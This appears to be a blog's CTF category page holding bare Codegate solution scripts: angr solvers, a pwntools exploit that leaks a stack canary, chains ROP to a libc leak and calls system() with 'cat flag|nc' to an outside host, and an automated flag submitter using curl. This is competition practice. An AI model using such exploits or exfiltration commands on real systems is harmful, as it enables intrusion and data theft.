1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | import angr import claripy fgets = 0x00000000004007D5 find = (0x404fda,0x0404FAB,0x404FBC,0x404FDA,) avoid = tuple([0x4000060,0x4007ef,0x400818,0x400838,0x400861,0x400890,0x4008b9,0x4008e2,0x40090b,0x400934,0x400977,0x4009a0,0x4009c9,0x4009f2,0x400a1b,0x400a47,0x400a6c,0x400a95,0x400abb,0x400ae0,0x400b09,0x400b3f,0x400b68,0x400ba4,0x400bd6,0x400bff,0x400c31,0x400c5d,0x400c82,0x400cab,0x400cd0,0x400cf5,0x400d1b,0x400d40,0x400d69,0x400d92,0x400db2,0x400dd7,0x400e00,0x400e26,0x400e52,0x400e7b,0x400eb8,0x400edd,0x400f06,0x400f2f,0x400f58,0x400f78,0x400fa1,0x400fd0,0x400ff5,0x40101b,0x40104b,0x401070,0x401099,0x4010c2,0x4010e2,0x40110b,0x401134,0x40115d,0x401186,0x4011c2,0x4011eb,0x40121b,0x401244,0x40126d,0x401296,0x4012bf,0x4012e8,0x40131e,0x401347,0x401373,0x40139c,0x4013c5,0x4013e5,0x40140e,0x401437,0x401460,0x401489,0x4014b2,0x4014db,0x401504,0x40152d,0x401556,0x40157f,0x4015a8,0x4015d1,0x401600,0x401629,0x401652,0x40167b,0x4016a4,0x4016d3,0x4016fc,0x401725,0x40177b,0x4017a4,0x4017cc,0x4017f5,0x40181e,0x401854,0x40187d,0x4018b3,0x4018dc,0x401905,0x40192e,0x401957,0x401980,0x4019a9,0x4019d2,0x4019fb,0x401a24,0x401a53,0x401a7c,0x401aac,0x401ad5,0x401afe,0x401b2d,0x401b56,0x401b7f,0x401ba4,0x401bcd,0x401bf5,0x401c2b,0x401c5a,0x401c83,0x401cac,0x401cd5,0x401cfe,0x401d23,0x401d49,0x401d6e,0x401d97,0x401dd3,0x401dfc,0x401e25,0x401e4a,0x401e70,0x401e95,0x401eba,0x401ee3,0x401f12,0x401f3b,0x401f64,0x401f8d,0x401fb6,0x401fdf,0x402008,0x402031,0x40205a,0x402083,0x4020a8,0x4020cd,0x4020f3,0x402118,0x402141,0x40216a,0x4021a0,0x4021c9,0x4021ff,0x402224,0x40225d,0x402283,0x4022a8,0x4022d1,0x4022fa,0x402323,0x40234c,0x402375,0x40239e,0x4023c3,0x4023e8,0x40240d,0x402433,0x402458,0x40248e,0x4024c0,0x4024fc,0x402525,0x40254a,0x40256f,0x402595,0x4025ba,0x4025e3,0x402640,0x402672,0x402697,0x4026c6,0x4026ef,0x40271f,0x402748,0x40277e,0x4027a7,0x4027cd,0x4027f2,0x40281b,0x402844,0x40286d,0x402896,0x4028bf,0x4028f1,0x40291a,0x402943,0x402968,0x40298d,0x4029b6,0x4029db,0x402a15,0x402a3a,0x402a69,0x402a92,0x402abb,0x402af1,0x402b1a,0x402b43,0x402b79,0x402b9e,0x402bc7,0x402bf0,0x402c15,0x402c3a,0x402c69,0x402c92,0x402cb7,0x402cdd,0x402d02,0x402d2b,0x402d61,0x402d8a,0x402db3,0x402dd8,0x402e01,0x402e2f,0x402e58,0x402e8a,0x402eaf,0x402ede,0x402f03,0x402f2c,0x402f55,0x402f90,0x402fb6,0x402fe8,0x403011,0x40303a,0x40305a,0x403083,0x4030ac,0x4030d5,0x4030fe,0x40311e,0x403154,0x40317d,0x40319d,0x4031c6,0x4031ef,0x403218,0x403241,0x40326a,0x403293,0x4032da,0x403307,0x403330,0x403359,0x403395,0x4033cb,0x4033eb,0x403414,0x40343d,0x403466,0x40348f,0x4034b8,0x4034e1,0x403501,0x40352a,0x403559,0x403582,0x4035ab,0x4035d4,0x40360a,0x40362a,0x403660,0x403689,0x4036b2,0x403702,0x40372b,0x403754,0x40378a,0x4037c0,0x4037e9,0x403812,0x40383b,0x403864,0x40388d,0x4038c3,0x4038f9,0x40392f,0x403958,0x40397d,0x4039a3,0x4039c8,0x4039f1,0x403a1a,0x403a43,0x403a6c,0x403a91,0x403ac0,0x403ae5,0x403b14,0x403b3d,0x403b66,0x403b8f,0x403bb8,0x403be1,0x403c06,0x403c2b,0x403c5a,0x403c83,0x403cac,0x403ce2,0x403d0b,0x403d34,0x403d5d,0x403d82,0x403da7,0x403dd6,0x403dff,0x403e28,0x403e51,0x403e90,0x403ed1,0x403f07,0x403f30,0x403f66,0x403f8b,0x403fb0,0x403fd6,0x403ffb,0x404024,0x40405a,0x404083,0x4040ac,0x4040d1,0x4040f6,0x40411c,0x404141,0x40416a,0x404193,0x4041c9,0x4041f2,0x404218,0x40423d,0x404266,0x40428f,0x4042b8,0x4042e1,0x40430a,0x40432f,0x404358,0x40437d,0x4043a2,0x4043d4,0x4043fa,0x40441f,0x404448,0x404471,0x40449a,0x4044c3,0x4044ec,0x404511,0x40453a,0x40455f,0x404584,0x4045ad,0x4045d2,0x4045f8,0x40461d,0x404646,0x40466f,0x404698,0x4046c1,0x4046ea,0x40470f,0x404738,0x40475d,0x404782,0x4047ab,0x4047d0,0x4047f5,0x40481a,0x404840,0x404865,0x40488e,0x4048b7,0x4048dc,0x404901,0x404930,0x404959,0x404982,0x4049ab,0x4049d4,0x4049fd,0x404a1d,0x404a46,0x404a6f,0x404a98,0x404ac1,0x404aea,0x404b0a,0x404b33,0x404b5c,0x404b85,0x404bae,0x404bd7,0x404c00,0x404c29,0x404c6c,0x404c95,0x404cbe,0x404ce7,0x404d10,0x404d39,0x404d6f,0x404d98,0x404dc1,0x404dea,0x404e13,0x404e3c,0x404e61,0x404e90,0x404eb9,0x404ee2,0x404f0b,0x404f30,0x404f68,0x404f9]) p = angr.Project('/tmp/angrybird') s = p.factory.blank_state(addr = fgets ) serial = s.se.BVS("flag", 24*8) ebp = 0x606f00 s.memory.store(ebp-0x70, claripy.BVS(0x606018,64)) s.memory.store(ebp-0x68, claripy.BVS(0x606020,64)) s.memory.store(ebp-0x60, claripy.BVS(0x606028,64)) s.memory.store(ebp-0x58, claripy.BVS(0x606038,64)) s.memory.store(ebp-0x50, serial) s.regs.rbp = ebp pg = p.factory.path_group(s) pg.explore(find = find, avoid=avoid) pg print pg.found[0].state.se.any_str(serial).strip("\x00") | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | from pwn import * e = ELF('/root/codegate/babypwn') #l = ELF('/lib/i386-linux-gnu/libc-2.23.so') l = ELF('/root/codegate/92') # libcdb.com s = remote('110.10.212.130', 8889) #s = remote('0',8181) print s.recvuntil(' >') s.sendline('1') print s.recvuntil(':') s.send('a'*41) print s.recvuntil('a'*41) canary = u32('\x00'+s.recv(4)) print hex(canary) s.sendline('1') print s.recvuntil(':') pppr = 0x8048B83 c_send = 0x080488B1 c_recv = 0x08048907 send = 0x08048700 rop = '1'*0xc #rop += e.symbols['mend'] + p32(pppr) + p32( rop += p32( c_send ) + p32( pppr+2 ) + p32( e.got['send'] ) rop += p32( c_recv ) + p32( pppr+1 ) + p32( e.got['send'] ) + p32(40) rop += p32( send ) + 'AAAA' + p32( e.got['send'] + 4 ) s.send('a'*40+p32(canary)+rop) s.sendline('3') print s.recvuntil('Select menu > ') leak_libc = u32(s.recv(4)) system = leak_libc + (l.symbols['system'] - l.symbols['send']) print 'LIBC : %x' % leak_libc cmd = 'cat flag|nc cutejinu.xyz 4999;' s.send( p32(system) + cmd )#'ls|nc cutejinu.xyz 4999;' ) s.interactive() | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 | from pwn import * s = remote('110.10.212.138', 19091) s.recvuntil('Input >') sc = "TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA" s.sendline(sc) s.recvuntil('[*] USER : ') print s.recvuntil('Input') s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA') print s.recvuntil('Input') s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA==') s.sendline('"Y2F0IGZsYWc="') s.interactive()% | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | from pwn import * import angr import os import urllib2 def a(c): path = '/tmp/n/prob%d'%c s = process('/bin/sh') e = ELF(path) st = '0x%x' % list(e.search('Good'))[0] s.sendline( "objdump --disassemble %s|grep %s|awk '{print $1}'" % (path, st) ) res = s.recvline().strip() find = int( res.replace(':','') , 16 ) s.sendline("objdump --disassemble %s|grep \"exit@plt>\"|grep call|awk '{print $1}';echo END" % path) tmp = s.recvuntil('END').replace(':','').strip().replace('\nEND','').split('\n') avoid = [find+12,] for t in tmp: avoid.append(int(t,16)) avoid = tuple(avoid) # print find # print avoid # avoid = (0x0000400DD2,0x0000400DFB) project = angr.Project(path, load_options={'auto_load_libs':False}) argv1 = angr.claripy.BVS("argv1",100*8) initial_state = project.factory.path(args=[path,argv1]) pg = project.factory.path_group(initial_state) pg.explore(avoid=avoid,find=find) found = pg.found[0] solution = found.state.se.any_str(argv1) solution = solution[:solution.find("\x00")] return solution for i in range(1,102): # for i in [6,23,31,41,54,72,76,85,86,99,100]: try: print i t = urllib2.quote(a(i)) print t os.system("""curl 'http://110.10.212.131:8777/auth.php' -H 'Cookie: PHPSESSID=ufccld9ve2su5t7pksvdud4215' -H 'Origin: http://110.10.212.131:8777' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://110.10.212.131:8777/' -H 'Connection: keep-alive' --data 'prob=%d&key=%s' --compressed"""%(i,t)) except: print "ERROR" | cs |
'CTF' 카테고리의 다른 글
SECCON_2016 logger (0) | 2016.12.14 |
---|---|
SECCON_2016 cheer (0) | 2016.12.11 |
SECCON_2016 checker (0) | 2016.12.11 |
SECCON_2016 jmper (0) | 2016.12.11 |